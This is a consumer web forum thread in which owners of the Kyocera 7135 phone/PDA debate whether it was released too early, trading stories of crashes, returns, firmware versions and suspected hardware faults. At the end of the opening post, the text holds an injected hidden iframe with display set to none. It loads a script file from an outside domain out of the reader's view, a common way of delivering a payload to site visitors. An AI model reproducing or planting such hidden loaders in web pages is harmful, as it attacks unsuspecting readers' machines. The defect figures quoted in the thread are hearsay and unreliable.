+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Should the 7135 have been released

Upon receiving my 7135, I had it running 15 SECONDS before I got a BSD...

I charged it as directed and turned it on... tapped through the setup and then tried to tap on EIS...

...BAMMM!

Memory error : Reset

I ended up doing a hard reset and the phone is stuck on with a BSD... i.e. it won't turn off and hard resets do nothing.

No buttons work, nothing...

My replacement was supposed to be here today via FedEx...nope

now I wait.

I did gather from several Verizon reps, that there is a SIGNIFICANT number of the 7135's going bad... quotes I had were 5 out of 10 being returned and they want me to test my phone IN THE STORE to make sure it's a good one.

How could this happen from a company that did such a solid job on it's predecessor (6035).

I love this phone... just wish it worked... can't wait for the replacement.

Anyone else care to chime in?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I'm on my third one. maybe this ones charmed...
    Linda

17" powerbook OSX

To answer the question -- YES!!!

However, I've replaced each of the phones I've gotten (pre-Verizon GC and Verizon GC) due to hardware woes.

I'm glad that the return policies are in full effect. I LOVE THIS PHONE!
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

Re: Should the 7135 have been released

Originally posted by wxrman

I did gather from several Verizon reps, that there is a SIGNIFICANT number of the 7135's going bad... quotes I had were 5 out of 10 being returned and they want me to test my phone IN THE STORE to make sure it's a good one.
    I have worked with returns before. First off, 5 out of ten sounds like a serious overstatement. But based on my experience with returns, even if there were 5 out of 10, you would have to consider at least 3 of those 5 to be user-based, as opposed to defect-based. I found that 60-75% of the merchandise that was returned did not have anything wrong with it.

That is not to say that people are not having problems, just that I would take such a significant number as being inflated at best.
    ---------------
    The same thing we do every night, Pinky...

hope your right

I hope you are correct... I REALLY like what I see and hear about this phone. The dead phone that I have at the moment sure has a solid look and feel to it.

Thanks,

Administrator

Re: Should the 7135 have been released

Originally posted by wxrman
    ..How could this happen from a company that did such a solid job on it's predecessor (6035).

I love this phone... just wish it worked... can't wait for the replacement...
    someone dropped the ball and altell got a hold of the first run units. they did have issues on them which is why verizon didn't release the 7135 on time. the kyo geeks did have bugs in these phones but they also had some issues with the 6035 also, but since most of the public didn't know about the 6035 as early as they did with the 7135, the kyo geeks had time to get things in order, and sprint and verizon released it at virtually the same time.

now, factor in more features, the 1X network, mp3 player, different palm os an you can (and they did) have potential for more bugs to creep in the system...

it does seem the newer firmware has cured some issues though...

I just wish I had gotten mine sooner (could've had it in late December instead of mid February!)

Hopefully the "official" in-store VZ release (and the resulting increase in 7135 owners) will make Kyocera work even more aggressively towards ironing out any remaining issues.
    Please visit my picture site: Robert-O-Rama :)

This post is kind of ironic, but a very predictable example of human nature. We suffered through 9 months waiting for this thing to be released, with a lot of people commenting that they couldn't understand why it was taking so long. Now that it has been released (sort of), we see comments like this one wondering if it was released prematurely.

I for one am extremely glad it's available. Now that I have used my 7135 for a few months, I'd be really lost without it!
    Dave

patience

I didn't mind the wait as I was and am still quite happy with my 6035...

but

This is not a very good showing... wonder what specific problems are being encountered...

What are the problems?

1) Palm OS compatability?

2) Memory problems/requirements?

3) Poorly written Palm OS apps?

4) something else?

Probably not possible to get a reading on this... but I wonder how many people who did have problems wouldn't have if they hadn't loaded 3rd party apps on it? All Palm apps are pretty close to the OS. When this is the case apps can easily cause problems that seem totally unrelated to them. Hacks are the extreme example. Of course the whole "philosophy" behind Palm is extremely light weight apps that do amazing things and can completely change the character of your device... I keep thinking the analogy would be to hotsync your new Tungsten from your Palm V. I can imagine things would be *much* worse.
    -Quick

Since several of the software developers are making new versions to support the 7135, it would seem that they weren't really compatible with newer Palm OS or that there are thing specific to the 7135 version. It is a custom version made to work with the phone side.

There have been several people with problems with just the standard set up. More than likely they got defective hardware.

Mine has been pretty stable except for installing a launcher that caused crashes and testing some beta software in a way it wasn't intended. All fine now.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

jeh
    I wonder if we aren't looking at "edgy" hardware. As in, Kyo is trying to do too much with the components chosen.

Although I'm not trying to overclock my 7135 I tried running the "CPU profiling" feature of Afterburner 3.20. This reported a maximum stable CPU speed of only 36 MHz, from a default of 33. This seems to me to be a very small margin!

For comparison, my Visor Prism, which also has a normal CPU speed of 33 MHz, achieved 41 MHz max.

Hmmm...

I haven't had ONE fatal reset or reset needed (except for installing LauncherX, etc..etc...) my unit is pretty stable and battery is functioning perfectly.

So in other words, from my own experience, YES!!! it should've been released

I could not have survived much longer if it hadn't! I gave away my IIIc to my gf and had been using an old black & Green palm III and my 2 year old phone was on its last limb and only worked with a headset and frequently reset when bumped in & out of calls! Now I have it all working in one device with a mp3 player as well! If it had a tv tuner in it then I could live in a cardboard box and be happy forever! oh wait.... I do have Kinoma and Tealmovie! hehee
    iPhone therefore iAm.

demo phone

I got a demo model to use while my replacement comes in.

Fresh system ... no add-ons, installs, etc.

I installed Blazer 2.0 and ran it fine with only one exception but I think I was trying to do too much while it dl'd a file.

Otherwise it's pretty nice.

I hope that my replacement works this well.

Don't they test this s**T?

I haven't had any real problems but little annoyances...

Ok, I just gotta ask...:devillook And how would you compare this with that T-720 you are trying to dump on some unsuspecting sole?
    -Quick

I know that this phone is not without it quirks and bugs, but comparing that to the number of things it does right and does well, and things it does that nothing else can do in one handy little package? I still haven't seen anything out there that could replace this device for me. I too hope for the day when I can take my phone into Verizon and have them "flash" it into a perfect phone, but until that day (if ever it comes), I am making extremely good use of today's slightly buggy model. I do soft resets all the time, but hey, that didn't keep me from using PC's when Win 95 kept hanging up a few years ago. The pros far outweigh the cons for me. I'm am so glad this phone has been released, and I think most of us here would have gone crazy by now if they delayed release until it was perfect.

this is not just a phone/pda combo, this thing is roughly equivalent to the PCs of about 10-12 yrs ago. One division of a company cannot possibly fully test this thing, especially with the thousands of general apps out there. You do your best to develop and test, beta test, and at some point have to just release it to the public and let the early adopters find the bugs. Look how many revs it has taken microsoft to make a windows that didn't hang all the time (and Win ME was the worst, which was only a couple of years ago!). I think the 7135 is simply amazing, and so far improved from the 6035, it is like a whole new product. I wish I were on the development team for this product, I'd be proud (although at the same time I'd be working like crazy to get the most common and serious bugs out!).

my 2 cents anyway.

Kada

Kada...

Your absolutely right.

Excellent comparison with Windows.

I'm actually REALLY enjoying my demo unit.

COME ONNNNNNNN FEDEX!!

Delivery due tomorrow at 10:30am

Folks,

There are technical issues as to why this phone is so problematic, and Kyocera's engineering really dropped the ball.

The original GC phones for Alltel would freeze and RSD anytime a Palm fatal exception occured.

Without going into a long technical discussion, this means that Kyocera engineers were probably unable to have a Palm debugging session to see what's wrong.

I have an original GC/Alltel phone that is now running the 1.0.24 / 1.0.38 formware. This is slightly newer than the Verizon firmware which was clearly a disaster. Two guys in my office bought the 7135 and returned them because it was locking up all the time.

I only ran the Verizon firmware for a week before the newer stuff was available. But I can tell you that it locked up much more than the original GC/Alltel firmware. Since both guys in my office returned the phone, and I had many problems, I can only assume it was a disaster.

The firmware I have now is pretty stable. Most problems are solved, but the contrast issue reamains. Several months ago I returned a GC/Alltel phone that clearly had hardware problems. When I was on the phone with Kyocera, the rep told me that they did not have a fix for the contrast problems -- since mine still has this, I'm guessing it's hardware related.

So the latest firmware is pretty stable with contrast problems -- I'm happy with my phone, but's it's been a long road.

I'm sure people at Kyocera are going to be fired over this release. What could have been a remarkable device if released last year is now a liability. Too bad, the machenical engineering and concept are great.

I think it will settle down and Verizon will have stable firmware soon. I'm sure that Verizon is eating some costs and will think twice about releasing another PDA/phone combo from Kyocera. This launch has not gone too well for anyone.

Glenn